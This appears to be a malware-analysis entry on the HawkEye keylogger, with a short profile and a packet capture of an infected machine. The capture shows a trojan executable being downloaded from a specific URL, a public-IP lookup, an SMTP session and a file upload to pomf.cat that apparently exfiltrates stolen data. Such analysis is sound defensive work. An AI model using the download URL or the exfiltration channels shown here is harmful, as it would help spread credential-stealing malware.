Hawkeye often gets installed in a bundle with other malware. This is a Trojan and keylogger that is used to retrieve private information such as passwords and login credentials. This is an advanced malware that features strong anti-evasion functions.

Type Keylogger	Origin Unknown
First seen 1 January, 2013	Last seen 16 January, 2020

Also known as Predator Pain HawkEye Reborn

2020-01-16 05:49:31.337357 IP 192.168.86.25.57734 > 103.74.123.3.80: Flags [P.], seq 1:434, ack 1, win 16425, length 433: HTTP: GET /wp-content/images/views/lpL8Nb1A9u7xmz6.exe HTTP/1.1
E…u.@…….V.gJ{….P….wv..P.@)….GET /wp-content/images/views/lpL8Nb1A9u7xmz6.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: robotrade.com.vn
Connection: Keep-Alive

2020-01-16 05:49:31.582612 IP 103.74.123.3.80 > 192.168.86.25.57734: Flags [P.], seq 1:232, ack 434, win 60, length 231: HTTP: HTTP/1.1 200 OK
E…..@.)…gJ{…V..P..wv……P..<….HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Tue, 14 Jan 2020 23:25:30 GMT
Accept-Ranges: bytes
Content-Length: 770048
Date: Thu, 16 Jan 2020 10:49:30 GMT
Server: LiteSpeed

2020-01-16 05:49:31.582621 IP 103.74.123.3.80 > 192.168.86.25.57734: Flags [.], seq 232:1692, ack 434, win 60, length 1460: HTTP
E…..@.)…gJ{…V..P..wv……P..<….MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$…….PE..L….L.^…………………

2020-01-16 05:57:38.908500 IP 192.168.86.25.58597 > 192.168.86.1.53: 21329+ A? bot.whatismyipaddress.com. (43)
E..Gu……S..V…V….5.3.QSQ………..bot.whatismyipaddress.com…..
2020-01-16 05:57:38.931943 IP 192.168.86.1.53 > 192.168.86.25.58597: 21329 1/0/0 A 66.171.248.178 (59)
E..W..@.@..]..V…V..5…C..SQ………..bot.whatismyipaddress.com…………..a..B…
2020-01-16 05:57:38.932384 IP 192.168.86.25.57749 > 66.171.248.178.80: Flags [S], seq 3330673864, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4u.@…2…V.B……P………. .G……………
2020-01-16 05:57:39.018722 IP 66.171.248.178.80 > 192.168.86.25.57749: Flags [S.], seq 3621119920, ack 3330673865, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4H.@.t.l.B…..V..P………… ..$…………..
2020-01-16 05:57:39.018902 IP 192.168.86.25.57749 > 66.171.248.178.80: Flags [.], ack 1, win 16425, length 0
E..(u.@…2…V.B……P……..P.@)……….
2020-01-16 05:57:39.019044 IP 192.168.86.25.57749 > 66.171.248.178.80: Flags [P.], seq 1:76, ack 1, win 16425, length 75: HTTP: GET / HTTP/1.1
E..su.@…2{..V.B……P……..P.@)E…GET / HTTP/1.1
Host: bot.whatismyipaddress.com
Connection: Keep-Alive

2020-01-16 05:57:39.108839 IP 66.171.248.178.80 > 192.168.86.25.57749: Flags [FP.], seq 1:168, ack 76, win 256, length 167: HTTP: HTTP/1.1 200 OK
E…H @.t.k.B…..V..P……….P….=..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server:
Date: Thu, 16 Jan 2020 10:57:38 GMT
Connection: close
Content-Length: 13

73.135.186.44

2020-01-16 05:57:39.109947 IP 192.168.86.25.58823 > 192.168.86.1.53: 48639+ A? mail.privateemail.com. (39)
E..Cu……Q..V…V….5./n…………..mail.privateemail.com…..
2020-01-16 05:57:39.133179 IP 192.168.86.1.53 > 192.168.86.25.58823: 48639 1/0/0 A 198.54.122.60 (55)
E..S..@.@..Y..V…V..5…?.<………….mail.privateemail.com…………..:…6z< 2020-01-16 05:57:39.133535 IP 192.168.86.25.57750 > 198.54.122.60.587: Flags [S], seq 1866593274, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4u.@…-…V..6z<…KoA…….. ……………..

2020-01-16 05:57:42.829292 IP 192.168.86.25.53665 > 192.168.86.1.53: 26931+ A? pomf.cat. (26)
E..6u……[..V…V….5.”..i3………..pomf.cat…..
2020-01-16 05:57:42.894921 IP 192.168.86.1.53 > 192.168.86.25.53665: 26931 1/0/0 A 66.55.90.17 (42)
E..F..@.@..O..V…V..5…2..i3………..pomf.cat……………..B7Z.
2020-01-16 05:57:42.895402 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [S], seq 1844683945, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4u.@…….V.B7Z….Pm……… ……………..
2020-01-16 05:57:42.974800 IP 66.55.90.17.80 > 192.168.86.25.57751: Flags [S.], seq 2892794916, ack 1844683946, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@.,…B7Z…V..P…l.$m…..r……………..
2020-01-16 05:57:42.974977 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [.], ack 1, win 16425, length 0
E..(u.@…….V.B7Z….Pm….l.%P.@)……….
2020-01-16 05:57:42.975136 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [P.], seq 1:196, ack 1, win 16425, length 195: HTTP: POST /upload.php HTTP/1.1
E…u.@…….V.B7Z….Pm….l.%P.@)….POST /upload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=——————–8d79a48fbd2857a
Host: pomf.cat
Content-Length: 58733
Expect: 100-continue
Connection: Keep-Alive

2020-01-16 05:57:43.060637 IP 66.55.90.17.80 > 192.168.86.25.57751: Flags [P.], seq 1:26, ack 196, win 237, length 25: HTTP: HTTP/1.1 100 Continue
E..AU5@.,.FxB7Z…V..P…l.%m..mP…….HTTP/1.1 100 Continue

2020-01-16 05:57:43.060891 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [P.], seq 196:331, ack 26, win 16418, length 135: HTTP
E…u.@….J..V.B7Z….Pm..m.l.>P.@”#…———————-8d79a48fbd2857a
Content-Disposition: form-data; name=”files[]”; filename=”file.png”
Content-Type: image/png

2020-01-16 05:57:43.139827 IP 66.55.90.17.80 > 192.168.86.25.57751: Flags [P.], seq 26:431, ack 331, win 245, length 405: HTTP: HTTP/1.1 301 Moved Permanently
E…U6@.,.D.B7Z…V..P…l.>m…P…J…HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 16 Jan 2020 10:57:43 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Location: https://pomf.cat/upload.php

301 Moved Permanently

301 Moved Permanently

---

nginx/1.10.3 (Ubuntu)

2020-01-16 05:57:52.682786 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [P.], seq 1:33, ack 1, win 3650, length 32
E..H9.@……6z<..V..K..O.uP….P..B.E..220 PrivateEmail.com Mail Node

2020-01-16 05:57:52.683002 IP 192.168.86.25.57756 > 198.54.122.60.587: Flags [P.], seq 1:23, ack 33, win 16677, length 22
E..>v9@…-L..V..6z<…K….O.upP.A%j…EHLO ry4wn-7-malware

2020-01-16 05:57:52.768664 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [.], ack 23, win 3655, length 0
E..(?+@….o.6z<..V..K..O.up….P..G.{…….. 2020-01-16 05:57:52.768675 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [P.], seq 33:182, ack 23, win 3655, length 149
E…?/@……6z<..V..K..O.up….P..G~q..250-MTA-07.privateemail.com
250-PIPELINING
250-SIZE 81788928
250-ETRN
250-AUTH PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 STARTTLS

2020-01-16 05:57:52.768900 IP 192.168.86.25.57756 > 198.54.122.60.587: Flags [P.], seq 23:33, ack 182, win 16639, length 10
E..2v:@…-W..V..6z<…K….O.v.P.@.|…STARTTLS

2020-01-16 05:57:52.854183 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [P.], seq 182:206, ack 33, win 3655, length 24
E..@Bi@……6z<..V..K..O.v…..P..Gm…220 Ready to start TLS

2020-01-16 05:57:52.854586 IP 192.168.86.25.57756 > 198.54.122.60.587: Flags [P.], seq 33:190, ack 206, win 16633, length 157
E…v;@…,…V..6z<…K….O.v.P.@..z………….^ A..m…<…..k…35…H5.d..w. …i….(g….n.N..<>E….J.,.>…./.5…
….. .
.2.8…….3…………..mail.privateemail.com.
…………..
2020-01-16 05:57:52.941314 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [.], ack 190, win 3697, length 0
E..(F.@……6z<..V..K..O.v…..P..q………. 2020-01-16 05:57:52.943689 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [.], seq 206:1666, ack 190, win 3697, length 1460
E…F.@……6z<..V..K..O.v…..P..q……..Q…M…………!………C..M…… [ R.T…..;P.>..p……..9………/…………i…e..b…0…0……….H.’…w…….l.0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U.
..Sectigo Limited1705..U….Sectigo RSA Domain Validation Secure Server CA0…191018000000Z..201113235959Z0a1!0…U….Domain Control Validated1!0…U….PositiveSSL Multi-Domain1.0…U….privateemail.com0..”0.. *.H………….0..
……I..b]…….x,.PI.Cq1…|..}H.P.!..R.w..W%..:>….)t….E8P…q..{.2Bl{@….OcV.e1t.\iG..2.-.iP..a.”…;…..==…..q.A.*..c…].!.2.O…2….uq……..bfN~…&.J_l….c.@…$I’.’.p..mO./..5H.x|.P..D=A….z.gA..k, .TsFo.Nw<W}U#…(A.._…S…;.]daI..Gt……….F0..B0…U.#..0…..^.T…w………a.0…U……y..J..2…D…: